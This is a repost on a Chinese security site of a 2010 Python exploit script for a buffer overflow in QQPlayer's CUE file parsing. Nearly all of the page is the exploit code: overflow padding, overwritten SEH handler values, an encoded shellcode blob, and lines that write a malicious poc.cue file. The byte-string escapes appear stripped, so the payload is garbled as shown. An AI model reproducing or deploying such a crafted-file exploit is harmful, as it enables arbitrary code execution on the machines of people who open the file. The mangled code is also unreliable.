【Exp】QQPlayer CUE文件缓冲区溢出漏洞

admin 2021年4月3日19:09:35评论25 views字数 1241阅读4分8秒阅读模式

#!/usr/bin/env python
 
#################################################################
#
# Title: QQPlayer cue File Buffer Overflow Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: [url]www.qq.com[/url]
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQPlayer 2.3.696.400
# Vulnerable: QQPlayer
#
#################################################################
# Code :
 
head = '''FILE "'''
junk = "A" * 780
nseh ="x42x61x21x61"
seh  ="xa9x9ex41x00"
adjust="x32x42x61x33xcax83xc0x10"
shellcode=("hffffk4diFkTpj02Tpk0T0AuEE2C4s4o0t0w174t0c7L0T0V7L2z1l131o2q1k2D1l081o"
           "0v1o0a7O2r0T3w3e1P0a7o0a3Y3K0l3w038N5L0c5p8K354q2j8N5O00PYVTX10X41PZ41"
           "H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE2C5CJO1E0G1I4T1R2M0T1V7L1TKL2CK"
           "NK0KN2EKL08KN1FKO1Q7LML2N3W46607K7N684H310I9W025DOL1S905A4D802Z5DOO01")
junk_="R"*8000
foot ='''.avi" VIDEO'''+"x0a"'''TRACK 02 MODE1/8888'''+"x0a"+"INDEX 08 08:08:08"
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot
 
fobj = open("poc.cue","w")
fobj.write(payload)
fobj.close()

Author: Lufeng Li
Published: 2010-07-21

出处:http://www.exploit-db.com/exploits/14431/文章来源于lcx.cc:【Exp】QQPlayer CUE文件缓冲区溢出漏洞

相关推荐: 【VB技巧】VB WinInet Post发送表单数据模块

    VB WinInet Post 发送表单数据模块,VB WinInet Post 发送表单数据,VB WinInet Post 表单数据模块,VB WinInet Post 表单数据,VB WinInet 发送表单数据,VB WinInet Post …

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:09:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【Exp】QQPlayer CUE文件缓冲区溢出漏洞http://cn-sec.com/archives/319989.html

发表评论

匿名网友 填写信息